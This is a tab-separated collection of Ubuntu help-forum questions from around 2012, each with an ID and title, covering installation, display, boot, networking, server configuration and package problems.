219590	ubuntu-vm-builder failing to create 12.10 kvm vm	i am trying to create a kvm vm running quantal , but its ending badly . these are the parameters i am passing ... sudo ubuntu-vm-builder kvm quantal \ -- arch 'amd64 ' \ -- mem '4096 ' \ -- rootsize '6000 ' \ -- optsize '6000 ' \ -- swapsize '2048 ' \ -- kernel-flavour 'virtual ' \ -- hostname `` $ hostname '' \ -- domain 'shm ' \ -- destdir `` $ hostaname '' \ -- name 'gideon ravenor ' \ -- user 'someuser ' \ -- pass 'somepassword ' \ -- components 'main , universe , restricted ' \ -- libvirt 'qemu : ///system ' \ -- addpkg 'acpid ' \ -- addpkg 'openjdk-7-jdk ' \ -- addpkg 'openssh-server ' \ -- addpkg 'avahi-daemon ' \ -- addpkg 'linux-virtual ' \ -- addpkg 'squid-deb-proxy-client ' \ -- addpkg 'unattended-upgrades ' \ -- addpkg 'acpid ' \ -- addpkg 'puppet ' \ -- proxy 'http : //sky:8000/ubuntu ' \ -- flavour=virtual these are the errors that i am getting ... e : could n't download packages : busybox-initramfs initscripts isc-dhcp-client liblocale-gettext-perl libpam-modules locales python3 python3-minimal ubuntu-keyring any ideas ?
219591	hp 1940 lcd not recognize on my ubuntu	i use dual screen from my laptop to 19 '' hp 1940 lcd screen . however ubuntu only recognized it as unknown monitor with very low resolution 1024x768 unable to reach the maximum resolution the screen can give to 1280x1024 . does anyone know how to play around with this issue ? my ubuntu is 12.10-64
219596	grub problem after grub-repair	i had two os , win 7 and ubuntu , i was working with win and went out of the room and when came back i saw grub rescue ! ! ! i booted live and did grub_repaire and it still says multiple active partitions.operating system not found i feel that it can not find the ubuntu hard drive at all ! ! ubuntu @ ubuntu : /dev $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xde771741 device boot start end blocks id system /dev/sda1 * 61 61 0 0 empty /dev/sda2 2048 30146559 15072256 27 hidden ntfs winre /dev/sda3 * 30146560 30351359 102400 7 hpfs/ntfs/exfat /dev/sda4 30351360 334483299 152065970 7 hpfs/ntfs/exfat ubuntu @ ubuntu : /dev $ ls autofs dvdrw loop4 ppp ram5 shm tty15 tty29 tty42 tty56 ttys10 ttys24 uinput vcsa1 block ecryptfs loop5 psaux ram6 snapshot tty16 tty3 tty43 tty57 ttys11 ttys25 urandom vcsa2 bsg fb0 loop6 ptmx ram7 snd tty17 tty30 tty44 tty58 ttys12 ttys26 usbmon0 vcsa3 btrfs-control fd loop7 pts ram8 sr0 tty18 tty31 tty45 tty59 ttys13 ttys27 usbmon1 vcsa4 bus full loop-control ram0 ram9 stderr tty19 tty32 tty46 tty6 ttys14 ttys28 usbmon2 vcsa5 cdrom fuse mapper ram1 random stdin tty2 tty33 tty47 tty60 ttys15 ttys29 v4l vcsa6 cdrw fw0 mcelog ram10 rfkill stdout tty20 tty34 tty48 tty61 ttys16 ttys3 vcs vcsa7 char hpet mei ram11 rtc tty tty21 tty35 tty49 tty62 ttys17 ttys30 vcs1 vga_arbiter console input mem ram12 rtc0 tty0 tty22 tty36 tty5 tty63 ttys18 ttys31 vcs2 video0 core kmsg net ram13 sda tty1 tty23 tty37 tty50 tty7 ttys19 ttys4 vcs3 zero cpu log network_latency ram14 sda2 tty10 tty24 tty38 tty51 tty8 ttys2 ttys5 vcs4 cpu_dma_latency loop0 network_throughput ram15 sda3 tty11 tty25 tty39 tty52 tty9 ttys20 ttys6 vcs5 disk loop1 null ram2 sda4 tty12 tty26 tty4 tty53 ttyprintk ttys21 ttys7 vcs6 dri loop2 oldmem ram3 sg0 tty13 tty27 tty40 tty54 ttys0 ttys22 ttys8 vcs7 dvd loop3 port ram4 sg1 tty14 tty28 tty41 tty55 ttys1 ttys23 ttys9 vcsa ubuntu @ ubuntu : /dev $ someone said { remove the boot flag from sda1 , by typing in a terminal : sudo fdisk /dev/sda1 then press the 'a ' key , and 'enter ' . then press the '1 ' key , and 'enter ' . then press the 'w ' key , and 'enter'. } but after grub-repair i got this log : http : //paste.ubuntu.com/1371297/ then i try sudo fdisk /dev/sda1 and but it says unable to open /dev/sda1 ! which is right as sda1 is not in dev folder ( look at the picture ! ) can anybody help me ? i need to work on my windows for the rest of the semester and do n't care of my ubuntu . thank you
219598	ca n't install ubuntu 12.10 to my dell desktop . freezes after reboot copying files	just installed ubuntu 12.10 on a dell desktop with windows xp . after the reboot it does several processes then gets to copying files . after a minute or two it freezes . does n't complete the final steps . uninstalled and reinstalled . still not working
219602	ca n't get on `` go to meeting '' webinar	i just had ubuntu installed on my computer . tonight when i went to go on a webinar with `` go to meeting '' , it would n't let me on , saying that web browser would not support it . when i went to the requirements , it said i needed windows or mac . is there anything i can do ?
219609	how do i show active dhcp leases	not experiened with ubuntu . set up a dhcp server about a year ago but do n't remember the command to see the active leases .
219610	ca n't restart from ubuntu 12.10	i am dual-booting ubuntu 12.10 and windows 8 pro . both run seamlessly but i 've had the persistent issue of not being able to restart my machine properly from ubuntu . if i am on ubuntu and hit the 'restart.. ' option , the screen turns off and ubuntu shuts down , but the computer never turns off and grub bootloader never shows on the screen . however , rebooting from windows gets me to the bootloader as it should . turning off the machine completely with 'shut down ' works fine with both ubuntu and windows as well . this issue was present even when i was dual booting ubuntu 12.04 and windows 7 starter as well . my computer is an acer aod257 with 2 gb ram , intel atom n570 processor . any help would be greatly appreciated !
219613	how do i write to the screen outside normal window boundaries ?	how can i create irregularly shaped windows and/or write graphics to the screen outside window constraints ? what libraries might help me do this ? i would prefer solutions to be as portable as possible .
219614	how do i set a custom resolution in 12.04 with a nvidia video card ( 9600 gso ) ?	i have 32 bit 12.04 and my video card drivers are up to date at `` 304.64 '' yet my resolution appears capped at 1920x1080 . i am trying to get the resolution to 2560x1440 or even higher , as i am running this machine on a 42 '' lcd through hdmi and the 1920x1080 resolution will not stretch to fit the screen and is therefore fairly zoomed in . the 9600 gso supports up to 2560x1600 , so this should be no problem for the card itself . i have tried using xrandr , which successfully creates the 2560x1440 60 hertz mode but does not allow me to -- addmode or -- output it in . i have tried working with the xorg.conf , but i actually can not find a way to create the file since when i try to , i am given an error message stating that the # of monitors i have does not match the # of screens i have . can anyone provide some help or insight ?
219615	'/'var/www/ ' vs '/home/ $ user/public_html '	i recently started using ubuntu as a lamp server . i 've come across plenty of tutorials that say to place the files at '/var/www/ ' and i 've also seen others that put them in '/home/ $ user/public_html/ ' . during my testing and figuring stuff out , i was successfully able to view a test site url from each location . is one better than the other ? i thought that maybe it was just preference . but the more i think about it , the more i want to keep all my work in my home folder .
219617	splice gives blank screen on startup	i just installed splice from the humble bundle , and i get a blank screen on startup . i can hear the audio , and if i move my mouse around , i can hear the menu items or something changing . i have an amd radeon hd5800 series . i 'm using the fglrx-updates driver on 12.10 , fully updated . any ideas of things to try ? full screen or windowed , i get a blank window . also , other gl games are running just fine .
219619	the field for entering password freeze if no text is enter quickly after i install cinnamon on 12.04	iam a total newbie to ubuntu . i installed cinnamon through terminal . the problem is that when i boot up , if i do n't enter the password before 1 or 2 minutes the password field will freeze and wo n't accept any text inputs.the problem was most likely caused by cinnamon because i guess the problem started after i tried to install some cinnamon extensions . please answer in non-technical way as far as possible . i will never go back to windows whatever be the outcome . help me stay on to ubuntu .
219620	dell inspiron 1440 no wifi ubuntu 12.04	i used ubuntu for several months before the update came around and ever since then my wifi has been unable to connect ( let alone i can not see any available connections either ) . i have read everything online and followed all the code that everyone has advised yet nothing seems to work . somebody save me before i whack this computer . any suggestions are great ones
219621	no window options in cairo dock	i 'm not even sure how to describe this properly . i 'm running cairo dock on ubuntu 12.04 lts and i 've noticed that i no longer have the top bar of my windows . i mean , i have the bar itself , but it 's empty aside from the name of the window and the close / resize boxes . for instance , a simple nautilus window would have , when you move the cursor to the top bar , a list of options such as view / edit etc . i have nothing like that for any window or application . it 's just solid black . this is a huge problem and i 'm not sure what the issue is . has anyone else experienced this ?
219628	ubuntu either wo n't finish loading , or goes to terminal	i just upgraded to 12.10 and the upgrade process hung after reboot . instead of the usual purple loading screen , i get a low res black with yellow dots screen which does not go away . or i get the low res purple screen that eventually goes to a terminal . startx will get me a desktop without an interface , but i can start a terminal from there . i 've tried apt-get update then upgrade , which upgraded a few packages ( almost all libreoffice stuff ) but this did not change anything . i 've also tried mv xorg.conf axorg.conf thinking the display settings were n't set . this did nothing . any ideas ? my next step is installing from a live cd . will i be able to fix the upgrade this way , or will i have to reinstall ?
219629	pkg-config error ( no such file or directory )	if i try and compile the tutorial code for gtk3 with the command gcc simple.c -o simple 'pkg-config -- libs -- cflags gtk+-3.0' it gives off the error gcc : error : pkg-config -- libs -- cflag gtk+-3.0 : no such file or directory however if i run the command pkg-config -- libs -- cflag gtk+-3.0 > makefile and then edit the makefile such that the output of the above command is after gcc simple.c -o simple then it compiles with no problems at all . what gives ?
219631	can not open adobe reader on ubuntu 12.10 64bits	i downloaded adberdr9.5.1-1_i386linux_enu.deb from the official website and installed it . nothing wrong happened during the installation . but when i click adobe reader 's icon , it has no response . neither can i open a pdf file with adobe reader . i checked that the package name is adobereader-enu : i386 .
219632	squid on ubuntu server stops working in specific time period for specific websites	i have newly set up a proxy server for about 210 users . it runs ubuntu server 2012 and squid3 . the problem is just after 1:30 am , if the users try to open google.com , youtube.com , facebook.com or wikipedia.org , connection times out . but at that time the server can ping those sites perfectly well . even , if we telnet to the site and send get , it dumps the html code in terminal . previously ubuntu desktop version was there and terminating network manager used to solve it for short period of time . so it seemed that network manager was interfering with other processes . but with server version no gui network manager comes . so i am clueless about the problem . what can be the reason ? how to fix it ?
219633	how do you control how hybrid suspend works ?	i would like hybrid suspend to act a certain way . if i add the code # always use suspend_hybrid instead of suspend if [ `` $ method '' = `` suspend '' ] ; then method=suspend_hybrid fi pm_hibernate_delay=xx to /etc/pm/config.d/00-use-suspend-hybrid where xx is the number of seconds until the computer hibernates , does xx indicate the number of seconds until the computer writes the state of the ram to the disk , or until the computer actually goes into hibernation mode , or both ? i would like to use a hybrid suspend in which when i close the lid of my laptop , the state of the ram is both written to the disk and kept in the ram at the time that i close the lid of the laptop , and then after the xx seconds the computer actually goes into hibernate ( drops the contents of the ram from the ram ) . if this is not what the above code does , can someone give me the code that will do this ? thanks ! code taken from this question : how do i use pm-suspend-hybrid by default instead of pm-suspend ? update : i tested this for myself by simply taking out the battery of my laptop about thirty seconds after using hybrid suspend by closing the lid . when i started back up , the system booted as it would normally . this also occurred when i omitted the pm_hibernate_delay=xx line and when i ran sudo pm-suspend-hybrid from the terminal . therefore , it can be concluded that the system does not write the state of the ram to the disk as soon as it suspends . am i correct in this assumption ? if i am , i would like to know how to make hybrid suspend write the state of the ram to the disk when the computer suspends , not after the timer expires . i know that this question is out of vanity more than anything , but it has been posted for a month with not even a comment . is there someplace anybody knows of that i can go where i might be able to come up with a solution for myself ?
219634	toshiba portege 3480ct	noob to ubuntu and linux in general here so will need all the help i can get . i 've just received very old toshiba portege 3480ct from friend and hdd on it has no os . i have an ide adapter to usb and was wondering , can i install it as an external and then put hdd back into laptop ? what can i do here ? i tried but when ubuntu boots on old laptop when re-inserted as internal hdd , screen is all messed up and i can hear system loading forever . any help would be appreciated . thanks !
219640	i ca n't make my windows 8 boot loader to run ubuntu or even ask me which os to run as dual boot !	i 've been trying to install ubuntu 12.04 as secondary os on my laptop . the primary os i have is windows 8 . so i have partitioned drive where ntfs is for windows 8 and other partition is ext4 for ubuntu . when i installed ubuntu i picked the ext4 partition and picked 3 boot loader options so far : /dev/sta ata hitachi ( 750 gb ) < -= this ... /dev/sta1 windows 8 ( loader ) < -= and this ... /dev/sta2 /dev/sta5 /dev/sta6 ubuntu 12.04 ( 12.04 ) < -= and this ... /dev/stb after like 3 installations i still ca n't boot ubuntu , nor can even see any boot loader ... it goes straight to windows 8 booting ... please help ! this has been very frustrating day and a half ... and i do n't think it should take that long to figure out = [ answer : i could not find a proper solution for my problem . i 'm not sure if i encountered some drive corruption , or program glitch , the only solution that fixed my problem was to make drive back-up and completely re-partition my hard-drive . please post if anyone encounter similar problem . as i really would like to know why my drive failed to install ubuntu on my drive .
219642	how to update ubuntu 8.10 to have recent updates	when the update manager tries to update the computer , it gives the message : w : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/transmission/transmission-common_1.34-0ubuntu2.3_all.deb 404 not found please explain how to update version 8.10 if it gives this message .
219646	how to display from line 10 to line 23 in from passwd using tail ?	how to display from line 10 to line 23 in from passwd using tail ? i know that using tail -1/etc/passwd it will display last line from passwd so please help .
219647	redmine - backlogs - no such file to load -- nokogiri	i 'm trying to install backlogs 0.9.9 plugin for redmine 2.1.2 under ubuntu 12.10 . following the backlogs installation guide remine_install_path $ rails_env=production bundle exec rake db : migrate rake aborted ! no such file to load -- nokogiri /home/git/redmine/vendor/bundle/ruby/1.9.1/gems/acti ... [ ... ] however nokogiri seems to be there $ gem list | grep nokogiri nokogiri ( 1.5.5 ) am i doing something wrong ?
219648	vsftpd any password work for local users	my setup of vsftpd allows for local users to login using their usual passwords and another set of users to login through a passwd file . the problem i have now is that when using a local user 's login , then any password is being accepted and can let the user login ( the logins using the passwd file are ok ) . here is the vsftpd.conf : $ cat /etc/vsftpd.conf | grep -v ^ # listen=yes anonymous_enable=no local_enable=yes write_enable=yes local_umask=066 anon_umask=066 dirmessage_enable=yes xferlog_enable=yes connect_from_port_20=yes chroot_local_user=yes chmod_enable=yes chroot_list_enable=yes secure_chroot_dir=/var/run/vsftpd pam_service_name=vsftpd rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key virtual_use_local_privs=yes user_sub_token= $ user local_root=/home/ftp/ $ user guest_enable=yes guest_username=ftp and the /etc/pam.d/vsftpd file : $ cat vsftpd | grep -v ^ # auth sufficient /lib/security/pam_pwdfile.so pwdfile /home/ftp/passwd auth required pam_shells.so account required pam_permit.so not sure if there is any other relevant file i should post ( ? )
219649	sony vaio vpceg15fx brightness control problems	i am a new user in this forum , even though i have been a part time user of ubuntu for the last few years , i 've noticed that there are some brands like hp , dell , lenovo , etc ; that seem to be more friendly towards ubuntu . in this case i have a sony vaio vpceg15fx , i have been trying to install ubuntu since 2011 , but the same problem occurs with the screen , i am unable to control the brightness using the laptop hot keys . until two days ago i was able to control the screen brightness with a specific instruction ( among so many different options that i found but never worked ) , which i used according to what i read in one post ( ca n't adjust brightness in a sony vaio t13 ultrabook ) , as follows : echo 1000 > /sys/class/backlight/intel_backlight/brightness which i entered in the folowing file : /etc/rc.local . i have read different posts , different solutions , scripts , etc . ; i do n't know if i am the only sony vaio user of this specific model with this problem , but i would like to be able to use the hot keys ( fn + f5 : fn + f6 ) , and at the same time i would really appreciate if someone can explain step by step ( clearly , not in a cryptic way ) what to do in order to make this laptop to work 100 % with ubuntu . thanks a lot in advance for your time and patience .
219650	add searchmonkey to thunar custom actions	i see here that , in order to add as custom action in thunar the search with gnome-search-tool , the command is : gnome-search-tool âpath= % f and with catfish it is different : catfish -- fileman=thunar -- path= % f ( why the difference , by the way ? ) what 's the one for searchmonkey ? ( the above do not seem to work for it . )
219652	is there any support with a netgear wna3100 usb adapter in ubuntu 12.10 ?	has there been any changes or updates or additions to ubuntu 12.10 's to pick up a netgear wna3100 usb adapter ? or software updates ? or what can i do to get it to work in the latest ubuntu 12.10 ? please , assist .
219655	ubuntu 12.10 on virtualbox compiz error	hi i have installed ubuntu on virtual box with virtual clone drive 5.4 like the following : but then i get the following error : the application compiz has closed unexpectedly additional information : the version of virtual box is 4.2 , the host os is windows 8 , and the reason why i am using a virtual clone drive is because i do n't have a cd or usb on me at the moment .
219656	steam not opening or responding at all	the steam client wo n't open nor does it display any error message . i have tried right click > games . i ran steam steam : //open/games command , but the client just does not respond . removing it with apt-get remove steam , deleting the steam directory & the .deb file and reinstalling it , did not work either . this problem only occurred after i used killall steam.sh to force quit it , it was working fine before . i 'm running 12.10 on a 64bit laptop with no additional drivers installed . anyone else have this problem and a possible workaround ? thank you
219658	i 've done two fresh installs of 12.10 and vlc doesnt work on either ?	after installing 12.10 on two machines as fresh installs vlc does n't work on either it just presents the 'cone ' with the title of media at the top , this is with standard avi as well as mkv files . tried a reinstall etc to no avail . help appreciated . thanks stef g
219662	xf86openconsole : can not find a free vt : invalid argument	i'v set up an ubuntu 12.04 from the precreated openvz template . the host system is configured as follows : # $ cat /etc/issue debian gnu/linux 6.0 # $ uname -a linux openvz-02 2.6.32-16-pve # 1 smp fri nov 9 11:42:51 cet 2012 x86_64 gnu/linux # $ apt-cache showpkg proxmox-ve-2.6.32 package : proxmox-ve-2.6.32 # $ tail -n 3 /etc/apt/sources.list # pve packages provided by proxmox.com deb http : //download.proxmox.com/debian squeeze pve for a software project i need a minimal xserver and followed the instructions at https : //help.ubuntu.com/community/servergui . i simply installed the package xorg ( xorg 1:7.6+7ubuntu7.1 ) . now when i 'startx ' i get an error message fatal server error : xf86openconsole : can not find a free vt : invalid argument the complete output of startx # startx x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-23-generic x86_64 ubuntu current operating system : linux www 2.6.32-16-pve # 1 smp fri nov 9 11:42:51 cet 2012 x86_64 kernel command line : quiet build date : 29 august 2012 12:12:33am xorg-server 2:1.11.4-0ubuntu10.8 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : tue nov 20 08:46:04 2012 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' fatal server error : xf86openconsole : can not find a free vt : invalid argument please consult the the x.org foundation support at http : //wiki.x.org for help . please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log server terminated with error ( 1 ) . closing log file .
219663	internet extremely slow on ubuntu 12.04	can someone please let me know how can i increase internet speed on my ubuntu 12.04 machine ?
219665	how to install and run xmms	i hear that xmms1 is not available in ubuntu anymore ( what does that mean exactly ? ) , but in synaptic i see a lot of stuff related to xmms2 ( by the way , what 's the difference ? ) . i have installed these but now can not seem able to start it . how to use xmms ? is there a gui form of it , like it appears here and here ?
219674	error installing xmms on ubuntu 12.04	i want to install xmms media player on ubuntu 12.04 . i 'm following instructions , but when type ./configure i receive message bellow : * the glib-config script installed by glib could not be found if glib was installed in prefix , make sure prefix/bin is in your path , or set the glib_config environment variable to the full path to glib-config . configure : error : glib > = 1.2.2 not installed - please install first * i installed libglib2.0-dev , but still continue to receive this message . what have to do and where to find this glib-configv script ?
219677	undo repository upgrade	i recently added deb http : //de.archive.ubuntu.com/ubuntu quantal main to my sources.list and did an upgrade . this has screwed a few things up and i would like to revert back to my previous package versions . is there a way to do this with ppa-purge ?
219679	how to install ubuntu11.10 along with windows8 ?	how to install ubuntu 11.10 along with windows 8 ? i installed ubuntu 11.10 along with windows 8 , where i kept the boot mode in legacy . after successful insulation of ubuntu when i removed boot media ( dvd ) it shows the message as `` no operating system found '' and it could not open either windows 8 or ubuntu . i again changed boot mode to uefi then windows 8 was open . but it wo n't show the ubuntu .
219686	recover lost data/partition	this is what happened : i was running 12.04.1 and wanted to install 12.10. upgrade , but a fresh install . when setting up my computer i anticipated for this by dividing my 640gb hd in following partitions : 1 . 60 gb for ubuntu , boot 2 . 576 gb for data , mountpoint /home 3. swap , 4gb the idea was to manually select the correct partition in the installer but i got distracted for a moment and selected the wrong option . result : the installer started repartitioning the entire hd . when i noticed this i interrupted the installer , but upon reboot it was clear that i was too late , no os to boot to . i booted from a gparted live cd to see if i could recover the data on my previous /home-partition , but it 's gone . is there any way to recover the lost data ? i searched around and read alot about testdisk , but in all the tutorials i 've seen , the set-up has been much easier than what i 'm facing . i 've not only lost my partition table , it 's been replaced . thanks in advance for any ideas that might help ! if extra info is needed , please specify and i will do my best to provide .
219689	screen too dim in lubuntu	i have an acer aspire laptop with both lubuntu 12 and windows 7 installed on dual boot , my problem is when i boot into lubuntu the screen is too dim and i barely can see the desktop icons while when i boot into windows 7 the screen is normally lit and very bright . i tried to adjust the brightness to a higher level using the nvidia driver control center and also using randr command but it does n't fix the problem , i checked the display driver ( nvidia geforce 7 ) but it is correctly installed and configured . one thing i should mention is when i connect to the laptop remotely using vnc viewer , the screen shown in vnc is very bright . can anyone please help ?
219692	why the value of $ path is different for root and normal user ?	for normal user i get : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/monty/google_appengine which is actually the content of /etc/environment for root i get : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin what 's the reason behind this and which file contains this line ?
219693	cant find where to enter internet password and user name for dsl ethernet	in order to connect to the internet in windows 7 , there is a dialog box in which one enters the username and password in order to connect . i have diligently looked in many places , but i can not find where this internet username and password dialog box is in ubuntu . i am definitely connected to ethernet . ubuntu is clearly showing my ip address , ethernet address , etc . it is my understanding that the connection where i am is a dsl connection . the dsl company needs a password and username in order to access the account . where could i enter that ?
219694	how do i create a movie dvd to be played on a tv	i have all these dvd rips on my computer , and i want to put them on a dvd to play on my tv , as my laptop does n't have a hdmi port . what is the best way to do this ? i have ubuntu 12.04 . iv'e tried using brasero , but i do n't get any sound , just the image . please help . thank you .
219700	dual boot ubuntu server edition and windows 7 professional	i 've dual booted ubuntu desktop edition with windows but id now like to dual boot ubuntu server edition with windows 7 ; i have windows 7 installed on my laptop and i 'd like to install ubuntu server edition so i can run my kannel gateway installation on it . is this possible ? i havent seen articles on it anywhere ; and are there restrictions/problems i should expect from this installation ?
219704	ubuntu 12.10 live usb boot hangs at splash screen	i have created ubuntu 12.10-amd64 bootable usb disk . it boots but when i select install on harddisk or run without install , it just stops at the splash screen . i tried -nomodeset , but same thing happens . i removed splash from command line . the setup stops at stopping save kernel messages . does this have to do anything with ati graphics ? i 've ati 4000x series .
219706	whats consuming hdd space	i have single partition of 92gb in which i installed ubuntu 12.04 . and for some unknown reason a message pop ups saying that i only have 1gb of hdd space left . i ran command sudo du -hscx * on / and /home /home gave me this result 4.0k c : \nppdf32log\debuglog.txt 0 convertedvideo.avi 176m desktop 16k documents 169m downloads 4.0k examples.desktop 17m file.txt 4.0k music 984k pictures 4.0k public 320k red hat 6.iso 2.5m syslog-ng_3.3.6.tar.gz 4.0k templates 8.0k terminal.png 1.2m thunderbird attachments 698m ubuntu10.04lts.iso 16k ubuntu one 4.0k untitled folder 4.0k videos 21g virtualbox vms 22g total and / gave me this result 81g home 0 initrd.img 0 initrd.img.old 833m lib 16k lost+found 68k media 4.0k mnt 260m opt du : can not access `proc/8339/task/8339/fd/4 ' : no such file or directory du : can not access `proc/8339/task/8339/fdinfo/4 ' : no such file or directory du : can not access `proc/8339/fd/4 ' : no such file or directory du : can not access `proc/8339/fdinfo/4 ' : no such file or directory 0 proc 640k root 908k run 8.6m sbin 4.0k selinux 4.0k srv 0 sys 148k tmp 3.3g usr 436m var 0 vmlinuz 0 vmlinuz.old 86g total if you look at the result returned by / it shows that /home is consuming 81gb but on the other hand /home returns only 22gb . i cant figure out whats consuming the hdd . i have not installed anything except virtual machines perpetrator found using disk usage analyzer
219711	user ca n't login to tty1	hope it 's ok to ask questions about linux mint 13 which is based on ubuntu 12.04 . all of a sudden my system boots to tty1 prompt . even in tty prompt i am not able to login . but root can login . any clues ?
219712	recent ubuntu update prevents mysql root access	i recently updated my ubuntu ( 10.04 lts ) server ( apt-get update , apt-get upgrade ) , and everything works fine , apart from the root access to my mysql database . phpmyadmin , cakephp , and essentially all connections return similar access errors . for example , pma returns 'connection for controluser as defined in your configuration failed . ' i have tried to find similar examples of this instance , but can not find assistance in what configuration i should be changing to restore root log in access . the same issue has occurred on two servers . one has additional users so i could get around it , but the other is a new development server with only root mysql access , so i am stuck on how to resolve this .
219721	glx on nvidia optimus , ubuntu 12.04	i have a laptop that has an nvidia optimus graphic card setup . i have tried running minecraft on that laptop , and the game crashes after login , with the following error : org.lwjgl.lwjglexception : could not init glx i tried to update my drivers , but no driver update was available . i searched for people asking the same question and i found none , hence the following question : is it possible to enable glx on nvidia optimus ? if yes , how to ? thank you in advance . edit : more information about the graphic card lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation device 1058 ( rev a1 ) lshw -c video *-display description : vga compatible controller produit : nvidia corporation fabriquant : nvidia corporation identifiant matériel : 0 information bus : pci @ 0000:01:00.0 version : a1 bits : 64 bits horloge : 33mhz fonctionnalités : pm msi pciexpress vga_controller bus_master cap_list configuration : driver=nvidia latency=0 ressources : irq:16 mémoire : da000000-daffffff mémoire : d0000000-d7ffffff mémoire : d8000000-d9ffffff porte/s:3000 ( taille=128 ) *-display description : vga compatible controller produit : 2nd generation core processor family integrated graphics controller fabriquant : intel corporation identifiant matériel : 2 information bus : pci @ 0000:00:02.0 version : 09 bits : 64 bits horloge : 33mhz fonctionnalités : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 ressources : irq:44 mémoire : db000000-db3fffff mémoire : c0000000-cfffffff porte/s:4000 ( taille=64 )
219722	why do signed deb packages say they 're not authenticated when copied to my private deb repo ?	quick version i have set up a private deb repository and copied some signed deb packages into it . i have installed the signing key locally . however when i try to install from the repo i get this warning : warning : the following packages can not be authenticated ! when installing manually , i can just press y but i want to install these packages automatically using puppet , and that fails . so what 's the problem ? do i need to resign packages with a key i control ? is there a better way of ensuring i have a particular version of puppet installed ? more details i have got the packages from the puppet debian repository - http : //apt.puppetlabs.com/ i just copy the package from ( for lucid ) this directory the repository is then updated with a script that runs these commands for each repo : cd /var/www/html/apt/ubuntu/lucid dpkg-scanpackages binary /dev/null | gzip -9c > binary/packages.gz dpkg-scansources sources /dev/null | gzip -9c > sources/sources.gz i have installed the signing key on the client . $ sudo apt-key list /etc/apt/trusted.gpg -- -- -- -- -- -- -- -- -- -- ... pub 4096r/4bd6ec30 2010-07-10 [ expires : 2016-07-08 ] uid puppet labs release key ( puppet labs release key ) < info @ puppetlabs.com > ... the rationale for doing this is that i want all puppet clients to be the same version . so all machines should get the packages from my repository by using the following pin in /etc/apt/preferences.d/puppet : package : puppet puppet-common facter pin : origin deb.example.org pin-priority : 1001 ( we are currently using puppet 2.6.x , so i need a priority of 1001 to downgrade precise clients from 2.7.x ) . i have read about holding packages but that does n't help me change package versions . all suggestions welcome .
219723	how do i fake an mx record for a domain ?	i 'm testing two mail servers that live on two ( virtual ) machines with made up domain names for emails . when one of the servers needs to send an email to the other one , it seemingly performs a dns lookup for the recipient domain 's mx record , which does n't point the sender server to the correct ip , no matter what ip/domain mapping i put in /etc/hosts . so should i install a dns server and create a custom mx record for the recipient domain ? how do i do this on ubuntu 12.04 or is there an easier way ?
219724	how can i see if i 'm logged in via vpn ?	i use juniper networks ( a java program that establishes a vpn connection ) . does a command line command exist that lets me check to see if i 'm logged in with juniper ?
219725	empathy protocol icons	i 'm surprised that empathy ca n't display the protocol icons . even in the latest ubuntu 12.10 . i 'd like to know why if someone can tell me .
219726	ipod-rhythmbox playlist issue	i have read other threads , including launchpad complaint of the same nature . yet i feel the need . unlike the problem here : rhythmbox ipod issues ? when i sync ipod and rhythmbox , the song does get transferred . no issues there . however , the song refuses to be a part of any playlist . to reiterate , i can not make a song part of a playlist in my ipod . during sync , the song shows itself a part of the playlist , but after disconnection , it is never heard in the playlist . an example if you want further clarity . i have a song . 'jean sibelius ' . i sync it to ipod . sync successful . i drag it to a playlist . successful . i disconnect ipod . i check the ipod , song is present . i expect to hear the song as part of playlist . that does n't happen . playlists are important for me . this is similar to the issue mentioned here . https : //bugs.launchpad.net/ubuntu/+source/rhythmbox/+bug/970924 however , till so far , no playlist has disappeared . i have an old playlist that i have continued . in addition , there are only 2 requests for the bug ( excluding mine ) . kindly help me in this regard .
219729	set up ubuntu server 12.04 for my office	as i have great interest in linux , i suggested my gm to update my office server to ubuntu . he agreed to buy a new server ( hardware ) after explaining him the good things about linux & bad things about windows . the scenario is : the main server will be ubuntu 12.04 lts ( where i should create a domain & users on domain ) . the old server ( which is win 2003 ) is going to be an application server . around 30+ windows ( both win 7 & vista , 32 & 64 bit ) machines should connect to the domain & be able to access the shared folders on ubuntu server . i really appreciate some help as i do n't have any experience on linux server . at least how to guidelines .
219734	ubuntu 12.10 very high temprature on idle	i upgraded my laptop to ubuntu 12.10 and my laptop temperature went extremely high . it 's over 80 degrees celcius on idle and it can easily go to 87c with just a little browsing . on 90c my laptop shuts down . i am pretty sure it 's 12.10 problem because i did n't have this problem with previous releases . also , i have dual boot with windows vista and when i boot it , the temps are normal . my cpu is intel core 2 duo t8300 and my gpu is ati mobility radeon x2300 any suggestions ? thanks for your time !
219735	software center from kubuntu	i was trying to install pysdm on my kubuntu when i saw that i couldnt found it in software center , but in ubuntu software center it is . shouldnt kubuntu have repositories from ubuntu , it is in ubuntu 's family ? if no , how can i get ubuntu repository in kubuntu software center ? it is no duplicate since `` pysdm '' is just an example , there are many software that are missing from muon software center and exist in ubuntu software center . thanks for the people that answered . wanted to know if why they are different since they share repositories ( or maybe they do n't share repositories and i am mistaken ) .
